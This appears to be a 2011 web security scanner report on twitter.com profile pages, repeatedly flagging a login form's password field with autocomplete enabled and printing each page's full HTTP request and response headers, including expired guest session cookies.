GET /malsup/lists/memberships HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:30 GMT Server: hi Status: 200 OK X-Transaction: 1296224909-80319-15886 ETag: "c8e3bcf74656418e1966d131ca1712ec" Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT X-Runtime: 0.29750 Content-Type: text/html; charset=utf-8 Content-Length: 53194 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /mattbanks HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:20 GMT Server: hi Status: 200 OK X-Transaction: 1296225020-89730-48319 ETag: "ec0575d0afb2bf3f6fc09ae312d729c0" Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT X-Runtime: 0.01604 Content-Type: text/html; charset=utf-8 Content-Length: 50027 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /mennovanslooten HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:10 GMT Server: hi Status: 200 OK X-Transaction: 1296225070-8349-1627 ETag: "d5a74d3b21022a46e5228042d143d163" Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT X-Runtime: 0.01281 Content-Type: text/html; charset=utf-8 Content-Length: 48347 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /messengerpost HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:43 GMT Server: hi Status: 200 OK X-Transaction: 1296225043-32375-15875 ETag: "e9683276160c0ad3462c344153ccbcdb" Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT X-Runtime: 0.01196 Content-Type: text/html; charset=utf-8 Content-Length: 50655 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /miketaylr HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:15 GMT Server: hi Status: 200 OK X-Transaction: 1296225015-365-19064 ETag: "fe6b40f83a3db7f038fdf6a1c2da2712" Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT X-Runtime: 0.01247 Content-Type: text/html; charset=utf-8 Content-Length: 50661 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /moxiesoft HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:16:24 GMT Server: hi Status: 200 OK X-Transaction: 1296224184-1250-55880 ETag: "c8b3c0b1df873136d3d1cad3c8b419ff" Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT X-Runtime: 0.01726 Content-Type: text/html; charset=utf-8 Content-Length: 51386 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /onlyjazz HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224920-98437-32805 ETag: "a870c25d2bf45fd1f02dca10a6c09b7f" Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT X-Runtime: 0.00899 Content-Type: text/html; charset=utf-8 Content-Length: 49524 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /oschina HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:47 GMT Server: hi Status: 200 OK X-Transaction: 1296224927-42931-41515 ETag: "4ec91c8ea22a5f99253e904c27c6fcbf" Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT X-Runtime: 0.00766 Content-Type: text/html; charset=utf-8 Content-Length: 42639 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /rachbarnhart HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:34 GMT Server: hi Status: 200 OK X-Transaction: 1296225034-44205-8520 ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc" Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT X-Runtime: 0.01426 Content-Type: text/html; charset=utf-8 Content-Length: 52627 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /rem HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:36 GMT Server: hi Status: 200 OK X-Transaction: 1296225036-70162-12873 ETag: "f1048f44c2dbfae0ca279695ab2f56e2" Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT X-Runtime: 0.00958 Content-Type: text/html; charset=utf-8 Content-Length: 54681 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /rickrussie HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:14 GMT Server: hi Status: 200 OK X-Transaction: 1296225014-95753-62367 ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96" Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT X-Runtime: 0.00915 Content-Type: text/html; charset=utf-8 Content-Length: 51643 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /roctimo HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:29:11 GMT Server: hi Status: 200 OK X-Transaction: 1296224951-66281-31354 ETag: "9b0bbae04a168790126e11b0e79fd723" Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT X-Runtime: 0.01993 Content-Type: text/html; charset=utf-8 Content-Length: 39421 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /rwaldron HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:12 GMT Server: hi Status: 200 OK X-Transaction: 1296225072-30588-18769 ETag: "467245d95e03c9c4efa08a62b5cdfe26" Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT X-Runtime: 0.01191 Content-Type: text/html; charset=utf-8 Content-Length: 52265 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ryanolson HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:39 GMT Server: hi Status: 200 OK X-Transaction: 1296225039-20499-32646 ETag: "d2211433f4fd1a9e6d92a74f1cc30349" Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT X-Runtime: 0.01104 Content-Type: text/html; charset=utf-8 Content-Length: 54351 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /scott_gonzalez HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:38 GMT Server: hi Status: 200 OK X-Transaction: 1296225038-20727-28381 ETag: "e3250478c3ea8a086affa5704f05f05d" Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT X-Runtime: 0.01142 Content-Type: text/html; charset=utf-8 Content-Length: 46926 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
